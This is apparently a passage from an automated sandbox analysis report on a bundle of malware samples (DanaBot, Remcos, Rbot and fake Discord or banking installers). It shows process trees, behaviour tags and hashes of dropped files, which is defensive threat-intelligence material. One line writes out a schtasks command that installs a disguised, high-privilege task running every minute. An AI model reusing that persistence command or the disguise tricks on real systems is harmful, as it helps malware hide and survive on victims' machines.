                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2384
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              PID:3472
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:1140
                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe "1693094551-890928033151256012-10401431761485668371708912483-435184132551764672"
                                                                                                            1⤵
                                                                                                              PID:2680
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe" service_service
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2684
                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe "9579124821775367255-645659161368818803-1147676403-2140648418-11812748941703184713"
                                                                                                              1⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:1444
                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe "1839941326-897492253-78956726820228144341523655429-1944721642-252246413-1718722023"
                                                                                                              1⤵
                                                                                                                PID:2872
                                                                                                              • C:\Windows\SysWOW64\sysdmkm.exe
                                                                                                                C:\Windows\SysWOW64\sysdmkm.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1824
                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe "-1336125947-158369284019211665763858291922909883031692389755-12577128221266512845"
                                                                                                                1⤵
                                                                                                                  PID:2336
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                  1⤵
                                                                                                                    PID:3556
                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe "18069097902002234103-156597085317176811131862545653-933278364-16142382571452171605"
                                                                                                                    1⤵
                                                                                                                      PID:2888
                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe "11861603471406922582-31203724619822677711277470047636772578-900135276398345450"
                                                                                                                      1⤵
                                                                                                                        PID:3964
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "20172364471946524763-286050711-20553494321288941611-1237295159-1621401407-358302699"
                                                                                                                        1⤵
                                                                                                                          PID:2344
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
                                                                                                                          1⤵
                                                                                                                            PID:2520
                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe "366809170-166054052912346377261587809278-1509051029104613323015347977261937338038"
                                                                                                                            1⤵
                                                                                                                              PID:1560
                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe "-1594758641-426896833626304998417494611320305984336879084-273028820-2049520792"
                                                                                                                              1⤵
                                                                                                                                PID:3332
                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe "1689971060713962838-1394811524-354243202-1647604700-25760211291627978926925064"
                                                                                                                                1⤵
                                                                                                                                  PID:4248
                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe "35120043322699206912461903821862999186-1993409976360176102-1116649164655547959"
                                                                                                                                  1⤵
                                                                                                                                    PID:3480
                                                                                                                                  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:6088
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4688
                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                      1⤵
                                                                                                                                        PID:2272
                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 57465EF3D4C0A4B63CC2A599C7154DB2 C
                                                                                                                                          2⤵
                                                                                                                                            PID:5924
                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                          taskeng.exe {5F3170A5-D46C-4A89-BFBB-C46275258C68} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                                                                                                                                          1⤵
                                                                                                                                            PID:3164
                                                                                                                                            • C:\Program Files\taskhostw.exe
                                                                                                                                              "C:\Program Files\taskhostw.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:1612
                                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:7780
                                                                                                                                              • C:\ProgramData\skja\xaogk.exe
                                                                                                                                                C:\ProgramData\skja\xaogk.exe start2
                                                                                                                                                2⤵
                                                                                                                                                  PID:6820

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\PROGRA~3\Hdlharas\mdkhm.zip

                                                                                                                                                Filesize

                                                                                                                                                56KB

                                                                                                                                                MD5

                                                                                                                                                b635f6f767e485c7e17833411d567712

                                                                                                                                                SHA1

                                                                                                                                                5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

                                                                                                                                                SHA256

                                                                                                                                                6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

                                                                                                                                                SHA512

                                                                                                                                                551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

                                                                                                                                              • C:\Program Files\taskhostw.exe

                                                                                                                                                Filesize

                                                                                                                                                226KB

                                                                                                                                                MD5

                                                                                                                                                9e02078809cf34479e5108fca383862c

                                                                                                                                                SHA1

                                                                                                                                                d82926214ea6cc5f1f162eb526a0a54a5b4068b3

                                                                                                                                                SHA256

                                                                                                                                                02ff75101c0d1cebbc3b45196cb87634af88447fbd7fca2ffe76a21f1d2be703

                                                                                                                                                SHA512

                                                                                                                                                52624e87e688ebadebb658f6a05db09c5543431b2bdd26141a13bdced80838638097781a0b89bd21b59aa14f64becf92663a93d76c7c7325d01fe70ddd6ec512

                                                                                                                                              • C:\ProgramData\Hdlharas\dlrarhsiva.exe

                                                                                                                                                Filesize

                                                                                                                                                9.1MB

                                                                                                                                                MD5

                                                                                                                                                64261d5f3b07671f15b7f10f2f78da3f

                                                                                                                                                SHA1

                                                                                                                                                d4f978177394024bb4d0e5b6b972a5f72f830181

                                                                                                                                                SHA256

                                                                                                                                                87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

                                                                                                                                                SHA512

                                                                                                                                                3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

                                                                                                                                              • C:\ProgramData\a5410c88f1\bween.exe

                                                                                                                                                Filesize

                                                                                                                                                248KB

                                                                                                                                                MD5

                                                                                                                                                a7d7a53ac62cc85ecddf710da9243d64

                                                                                                                                                SHA1

                                                                                                                                                4bfee487fae3e4daf9eaaeea9c5e7469c4e94ec1

                                                                                                                                                SHA256

                                                                                                                                                d20d9c4ca508991a5a3482ff1545ba5f39c96892538f3a50b720259f446dfee3

                                                                                                                                                SHA512

                                                                                                                                                ae56373353977726a36a56c0e8f2c70c0750594a7390421e1358fbcffcdbb9554d404b607e54102360e2086ce0cbb0049215b29e61c3a0e2425e4b959e9efe8a

                                                                                                                                              • C:\ProgramData\skja\xaogk.exe

                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                                MD5

                                                                                                                                                168e78a7154b2453627f5ca82e9ccced

                                                                                                                                                SHA1

                                                                                                                                                2a1b4df3e681f1b401c1d704351817e4642b8692

                                                                                                                                                SHA256

                                                                                                                                                d311d65ddc8477c84bd77baa9606980515962231ea048e6c65d3d9b1bc527464

                                                                                                                                                SHA512

                                                                                                                                                11d48effa4cf685fd12836222fd0e09d5f7be96b077d0292521e6341f1287b95fa7db5f94b2528bd83f0d7eff1a6c8ccff7270e3cd1fad1625b6c9040394e346

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                                                Filesize

                                                                                                                                                71KB

                                                                                                                                                MD5

                                                                                                                                                83142242e97b8953c386f988aa694e4a

                                                                                                                                                SHA1

                                                                                                                                                833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                                                                                                                SHA256

                                                                                                                                                d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                                                                                                                SHA512

                                                                                                                                                bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                                MD5

                                                                                                                                                69994ff2f00eeca9335ccd502198e05b

                                                                                                                                                SHA1

                                                                                                                                                b13a15a5bea65b711b835ce8eccd2a699a99cead

                                                                                                                                                SHA256

                                                                                                                                                2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

                                                                                                                                                SHA512

                                                                                                                                                ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0F772D19_Rar\LoveForyou.scr

                                                                                                                                                Filesize

                                                                                                                                                1.8MB

                                                                                                                                                MD5

                                                                                                                                                789183739b41d876a88e2091b75f0343

                                                                                                                                                SHA1

                                                                                                                                                a2ee6612c3a3eb56848ce9e204acb0d1fba63f6e

                                                                                                                                                SHA256

                                                                                                                                                de095132f160cdb9114dbec3e9fdebfa24277d3daf4adf03ca425022d1299605

                                                                                                                                                SHA512

                                                                                                                                                dd199bcdbde2ad421ae708e15696c7a1ce38e9cfaefa13254c1149d5de163fa346c129da08f8f90d01d57b8afb7578ff7ba0f9458466f4df4ae2c5a001e9d082

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe

                                                                                                                                                Filesize

                                                                                                                                                628KB

                                                                                                                                                MD5

                                                                                                                                                63596f2392855aacd0ed6de194d2677c

                                                                                                                                                SHA1

                                                                                                                                                6c8cf836c5715e21397894c9087b38a740163099

                                                                                                                                                SHA256

                                                                                                                                                0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb

                                                                                                                                                SHA512

                                                                                                                                                7204def70b4c68ff229322cbb4c06e9a30a8718af58fdee1c96b2eba6a6fc07b35cbbb88dc00c847a0d7be2a5cd6709c93e73e81988b97907dc6848c66f792b7

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe

                                                                                                                                                Filesize

                                                                                                                                                182KB

                                                                                                                                                MD5

                                                                                                                                                64d8b413b2f5f3842e6126b398f62ab5

                                                                                                                                                SHA1

                                                                                                                                                f1c74de5ca76f0feb233ac7b5fb5e0158fb37d79

                                                                                                                                                SHA256

                                                                                                                                                0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d

                                                                                                                                                SHA512

                                                                                                                                                328235f69b4db694cfd0e826d0012bb4b9d1f2971a27eec9fd27b106e9a6201a619bdd6ff0cfdad7144ef20276c423bd800ddbc9b5c6cff3c0c37e79837a48cf

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10320830101\b0ad451079.exe

                                                                                                                                                Filesize

                                                                                                                                                1.8MB

                                                                                                                                                MD5

                                                                                                                                                872a0153c2024560c2fbdd12f0d4e3ac

                                                                                                                                                SHA1

                                                                                                                                                7de72dcf60aa7a330d491e66d541de2eee7fa9d2

                                                                                                                                                SHA256

                                                                                                                                                8b1a5f7907bdfa0987fd34ace60056db50757f0ab8a9185bef39a9433e1f0a2c

                                                                                                                                                SHA512

                                                                                                                                                c6024f62c8105ff5cf48947529a7979989d92518dae29b91b334e176d6cd244511a33454e702264b39b696c316a683ea5090c2a5eeb651b3b4271bedd7ef3cf2

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe

                                                                                                                                                Filesize

                                                                                                                                                1.4MB

                                                                                                                                                MD5

                                                                                                                                                49e9b96d58afbed06ae2a23e396fa28f

                                                                                                                                                SHA1

                                                                                                                                                3a4be88fa657217e2e3ef7398a3523acefc46b45

                                                                                                                                                SHA256

                                                                                                                                                4d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225

                                                                                                                                                SHA512

                                                                                                                                                cd802e5717cf6e44eaa33a48c2e0ad7144d1927d7a88f6716a1b775b502222cc358d4e37bdbd17ebe37e0d378bb075463bce27619b35d60b087c73925a44a6d4

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe

                                                                                                                                                Filesize

                                                                                                                                                3.7MB

                                                                                                                                                MD5

                                                                                                                                                9b69bfe722972ef8e87a9b713f9dfc9d

                                                                                                                                                SHA1

                                                                                                                                                0de18f00a25702a346ced54b90152afa2003636f

                                                                                                                                                SHA256

                                                                                                                                                b56cea3ef0d518e728c514dbe306a9adb95e62866db0d0c6c3b78af2d869343a

                                                                                                                                                SHA512

                                                                                                                                                a8cdbd0abac994fe82e54c388b8a0ada02b87e48a17fafd470f7d45f385742545034d954a36baf81f9ddb63a6da776b7e78049182956419fb34d33aaa4c8c063

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2020.exe

                                                                                                                                                Filesize

                                                                                                                                                126KB

                                                                                                                                                MD5

                                                                                                                                                dd64540e22bf898a65b2a9d02487ac04

                                                                                                                                                SHA1

                                                                                                                                                30dc0f5fde0feeb409cfb5673d69e9ad7c33f903

                                                                                                                                                SHA256

                                                                                                                                                c3f1f481bf8890ae8e6c4687fc73fb9da1b03e5661f4c0961cdf119dfcd72da4

                                                                                                                                                SHA512

                                                                                                                                                8c496d77574199ebea8e2fe2136d7732013edb1df3de68f3cbc73ec3f36028817d7ac9c7bb068498f6100020a58175efb1a10fd77d14f921e4bca04fd41542a2

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\451B.tmp\putty.bat

                                                                                                                                                Filesize

                                                                                                                                                40B

                                                                                                                                                MD5

                                                                                                                                                5dbff324b3bdba08cbb6ac18161d31fa

                                                                                                                                                SHA1

                                                                                                                                                1d7da87db0db52d3755a8bdf066fe2309b9c2860

                                                                                                                                                SHA256

                                                                                                                                                0ee0d0d9500088d39c2c67bc5d8f576ecdeab55361caeef53ddf03c33778e2f7

                                                                                                                                                SHA512

                                                                                                                                                3dc1cf30f3733cc6606eda962e8ef8b2ffb883367e97a22f02a1fe09f7ab8f53e6e0b03dc01f55a292e04895c744948e553f5931343777e8eb98eb4718b6fd4e

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AIE8EE9.tmp

                                                                                                                                                Filesize

                                                                                                                                                33.9MB

                                                                                                                                                MD5

                                                                                                                                                40b2c66899570421c53ea366aef5acf9

                                                                                                                                                SHA1

                                                                                                                                                feb7c8459961c9e812c0a04dce52633ead820764

                                                                                                                                                SHA256

                                                                                                                                                bf68660833d7514dd4d63ea43317a72511974985054e4d2f5838fd798cd9cf08

                                                                                                                                                SHA512

                                                                                                                                                f2446cbd8d707d0ad6491703539515770a15298bf9e536d69f87ffaf8665cd1b3f70bae6610f5cc19ae094c8959eb84bf5b037207e926a315e9aaee92fec43bc

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_7652\dialog.jpg

                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                                MD5

                                                                                                                                                abf1076064505dee794fa7aed67252b8

                                                                                                                                                SHA1

                                                                                                                                                358d4e501bb3007feece82a4039cc1050f23fab4

                                                                                                                                                SHA256

                                                                                                                                                fb0d133f05de6aa6a7a3491ae532191a60c438b35d9ff7bfec9e63131f6f0c73

                                                                                                                                                SHA512

                                                                                                                                                9a4680a8d186c1d7550b5e03cbdd095b0c88b2e0249a3af75fa0253d2c9a6f0aa1dd570ecf1a273683a14e6c7b5fb11678be3da439a3bf23eab790372e96e321

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\APXPC.bat

                                                                                                                                                Filesize

                                                                                                                                                121B

                                                                                                                                                MD5

                                                                                                                                                6f03830aff31995957052b694b2211a0

                                                                                                                                                SHA1

                                                                                                                                                bc98df25a4accd29643b311c106e1cdcecdec93c

                                                                                                                                                SHA256

                                                                                                                                                7ddb76d54b187f9e03639ee200536062c36abea7f2fb073ca9bccfb5acc55934

                                                                                                                                                SHA512

                                                                                                                                                f02357a8148e3f0c2e3f8f44c317c94450cbda8acd1890369ad91cd1c140089bfbfd6659702f79761e49b8b665f37667d806ccaed416c6de43e1a99d07a69175

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe

                                                                                                                                                Filesize

                                                                                                                                                194KB

                                                                                                                                                MD5

                                                                                                                                                1de4e189f9e847758c57a688553b4f8f

                                                                                                                                                SHA1

                                                                                                                                                1b1580955779135234e4eb3220857e5a8d5168ac

                                                                                                                                                SHA256

                                                                                                                                                c439e919ee06a37656784b922599febcc1d6e2f9a1d43b9ee053e0af345af557

                                                                                                                                                SHA512

                                                                                                                                                9641fd69a2189a26bbf97b725976e3435597bb6a9b90a1404428dc496bb12ef02b8685eea42167f4a340d9e4df622bfb2725e19723b7459856a96aa8a61cd864

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Cab5409.tmp

                                                                                                                                                Filesize

                                                                                                                                                70KB

                                                                                                                                                MD5

                                                                                                                                                49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                SHA1

                                                                                                                                                1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                SHA256

                                                                                                                                                b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                SHA512

                                                                                                                                                bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe

                                                                                                                                                Filesize

                                                                                                                                                6.6MB

                                                                                                                                                MD5

                                                                                                                                                c108c1c76a3676b39aabbcf8aa9efb69

                                                                                                                                                SHA1

                                                                                                                                                f340b39f41adc4f47c81b990e5fd214043f1dfbc

                                                                                                                                                SHA256

                                                                                                                                                90b04fd7fe0d8ca43c6aa4affcf5c68a6f977ceeeaba8c0cbfcee4e8435ea460

                                                                                                                                                SHA512

                                                                                                                                                b7e9c67956e5be98adfa8d24fabed4a34972d878ccadba5d55d3e974ba86cf4438d1fc951b424e4575a5d41216b4b5437a73148c64987d32d9960fb2195642de

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DanaBot.dll

                                                                                                                                                Filesize

                                                                                                                                                2.4MB

                                                                                                                                                MD5

                                                                                                                                                9cb7b0d8e817636deed7b195e69f6156

                                                                                                                                                SHA1

                                                                                                                                                3a68463ef2313fa9580ff8048900ffcafb604114

                                                                                                                                                SHA256

                                                                                                                                                9e9c58dec15cf26e295f6d4dc1587468e6f1483e78ff2b8a2f47034b9731f5b1

                                                                                                                                                SHA512

                                                                                                                                                c8cb93a387cbfe13d1cfd131cffdce95656543cbb8838983015c981aad5cb9e7a6c1bbf94f248a83017420d7d51eea2ab44449333dd1557e2ec2a7017fc8a793

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DanaBot.exe

                                                                                                                                                Filesize

                                                                                                                                                2.7MB

                                                                                                                                                MD5

                                                                                                                                                48d8f7bbb500af66baa765279ce58045

                                                                                                                                                SHA1

                                                                                                                                                2cdb5fdeee4e9c7bd2e5f744150521963487eb71

                                                                                                                                                SHA256

                                                                                                                                                db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

                                                                                                                                                SHA512

                                                                                                                                                aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe

                                                                                                                                                Filesize

                                                                                                                                                444KB

                                                                                                                                                MD5

                                                                                                                                                0df064a92858ef4d9e5d034d4f23fa7b

                                                                                                                                                SHA1

                                                                                                                                                aed9a8905ddd7296eb394be451a4d72b7d5442b3

                                                                                                                                                SHA256

                                                                                                                                                d1afcd5386c713d7439d6fe2e8c2b2548b4b2c748a6873469daa33dc06c1da8f

                                                                                                                                                SHA512

                                                                                                                                                c35e914428a2f18d2bffc4ee1e9568c62066b48d8f655a9664e27be19a71183c77bc40c2ad39bd5f89e04a774e06caf83daa61a8f80913d6e6f82f3281ba3760

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe

                                                                                                                                                Filesize

                                                                                                                                                2.3MB

                                                                                                                                                MD5

                                                                                                                                                67b81fffbf31252f54caf716a8befa03

                                                                                                                                                SHA1

                                                                                                                                                3bc8d6941da192739d741dade480300036b6cebd

                                                                                                                                                SHA256

                                                                                                                                                db0e1b302775e21cc57a33730cdc33e7f5bcf408447dcf3e3b012edd7952a95a

                                                                                                                                                SHA512

                                                                                                                                                c1d2ab8820d922cf1e4e5130084ca3b8f2f227309468bebae079456f09bae093479f0e5e188039feb412443541f5cb5b8cc8bd9c203340b06cbd3feafa8747c4

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Instalação do Módulo Adicional de Segurança CAIXA.log

                                                                                                                                                Filesize

                                                                                                                                                266B

                                                                                                                                                MD5

                                                                                                                                                ed41aaa2d7d8a6570a725f9152b328e9

                                                                                                                                                SHA1

                                                                                                                                                489743930d4146e84885bb50bbfd7daedc795dc7

                                                                                                                                                SHA256

                                                                                                                                                fdcd219cb9d02814f3468150a2b76eae63447e21df8f211848613c8e74130817

                                                                                                                                                SHA512

                                                                                                                                                aa18cf5b7d3934199550ffab0fc9a9969bfd2c726abc21831b20569314132e803b23c147aa5c23e55b66c605760eca58dca758f97921b244148a3adb1c66501c

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Instalação do Módulo Adicional de Segurança CAIXA.log

                                                                                                                                                Filesize

                                                                                                                                                691B

                                                                                                                                                MD5

                                                                                                                                                d7666ad4d1d85711f86e500ba1dc1003

                                                                                                                                                SHA1

                                                                                                                                                e2b1ac1600740af35e9da5723e87d507c9d9649b

                                                                                                                                                SHA256

                                                                                                                                                44ee780303b72dc9226d9a3f5ef2ec60c1fa342eb3351e9c00c961176e2b7565

                                                                                                                                                SHA512

                                                                                                                                                aa2737c750f242bed8be6e668480881659cf3efa4e337a2c1119c4c28d4bd736f8dab8e09b373ff9f2774504196c01b24395ce840c969a01a63b346d2e448853

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe

                                                                                                                                                Filesize

                                                                                                                                                22KB

                                                                                                                                                MD5

                                                                                                                                                2ff5f278eceba92ec6afc38f31a21c08

                                                                                                                                                SHA1

                                                                                                                                                f9b34e6f7f2fb37ced2146108b4e52269a3835be

                                                                                                                                                SHA256

                                                                                                                                                823e831c3f112251b53dfe90ce379200e4129f28d40ef3c25b1bc98b5c347925

                                                                                                                                                SHA512

                                                                                                                                                10b2d1f2a475652b92271fbe44be2221d5a5e1d964e74212d1a39b3ca75721de1b9e7b1b3920cb43bfe31cdec465d5168b91178aa390402980314028e97bbbc1

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MSIBEE3.tmp

                                                                                                                                                Filesize

                                                                                                                                                1019KB

                                                                                                                                                MD5

                                                                                                                                                2330ebbe491c6026af5e8853f3692798

                                                                                                                                                SHA1

                                                                                                                                                6c62d81f6c90046714705bec931815a908b760ac

                                                                                                                                                SHA256

                                                                                                                                                15c35c5abf7bab8d1375f5622e31da14fd027ae1046b8a6ddfd74263fa34eda6

                                                                                                                                                SHA512

                                                                                                                                                81747ead7869f68e499a53537588d35485b5fd2b4505856cd589bca1f7296d971e78f3fd57a1c1d931dfe6c2668888b26eff49a96ecd740ecd1b271eb7058201

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

                                                                                                                                                Filesize

                                                                                                                                                761KB

                                                                                                                                                MD5

                                                                                                                                                c6040234ee8eaedbe618632818c3b1b3

                                                                                                                                                SHA1

                                                                                                                                                68115f8c3394c782aa6ba663ac78695d2b80bf75

                                                                                                                                                SHA256

                                                                                                                                                bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

                                                                                                                                                SHA512

                                                                                                                                                a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe

                                                                                                                                                Filesize

                                                                                                                                                337KB

                                                                                                                                                MD5

                                                                                                                                                db08740474fd41e2a5f43947ee5927b8

                                                                                                                                                SHA1

                                                                                                                                                dd57e443d85155ba76144c01943e74f3d0f5cf95

                                                                                                                                                SHA256

                                                                                                                                                4da1c19a7cdd07363b2b929212718241ef4f8f54e66e206c8c64e5e801603711

                                                                                                                                                SHA512

                                                                                                                                                4690f10aa0d5404146ba2989d89fc199b5e0589af21243359851c2a6b50e09d4f078065224afe93a870a7c4c48eddafde72b4acf097a30fad644a983a4d721c1

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe

                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                                MD5

                                                                                                                                                a4c8c27672e3bc5ec8927bc286233316

                                                                                                                                                SHA1

                                                                                                                                                381765ead6a38a4861fb2501f41266cb51ca949a

                                                                                                                                                SHA256

                                                                                                                                                fe80a9840598a276f604d2c97c588b66dd81ae21531474e713bead2833a37084

                                                                                                                                                SHA512

                                                                                                                                                e78b351606462b5f52bff7445fcbc6f6c7ea9082b52881dead20297594edc9005820ef6fd2685265f3d112bbead2553f44da3551480b99811641e2c052788bfe

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe

                                                                                                                                                Filesize

                                                                                                                                                531KB

                                                                                                                                                MD5

                                                                                                                                                331407eb1cd5dbdcf9cee0a5ebca9f07

                                                                                                                                                SHA1

                                                                                                                                                e8f3de98b17ab4b5436db96fe3c2c71c2c1b37e4

                                                                                                                                                SHA256

                                                                                                                                                51829cb21ec416ec0338cd411a191b37bb6b3b598c3d556cad1e6f172c8ff365

                                                                                                                                                SHA512

                                                                                                                                                60ee09cfd4e42d49d5e1df61818b9218e1dcee8bc1a41c72c7b7fafabb6dafa850ff0448a1bbf1d8cdb2451203b4ff8146339477d93d6a0309730a860ce692f1

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Remcos.exe

                                                                                                                                                Filesize

                                                                                                                                                92KB

                                                                                                                                                MD5

                                                                                                                                                fb598b93c04baafe98683dc210e779c9

                                                                                                                                                SHA1

                                                                                                                                                c7ccd43a721a508b807c9bf6d774344df58e752f

                                                                                                                                                SHA256

                                                                                                                                                c851749fd6c9fa19293d8ee2c5b45b3dc8561115ddfe7166fbaefcb9b353b7c4

                                                                                                                                                SHA512

                                                                                                                                                1185ffe7e296eaaae50b7bd63baa6ffb8f5e76d4a897cb3800cead507a67c4e5075e677abdbf9831f3f81d01bdf1c06675a7c21985ef20a4bae5a256fd41cc0f

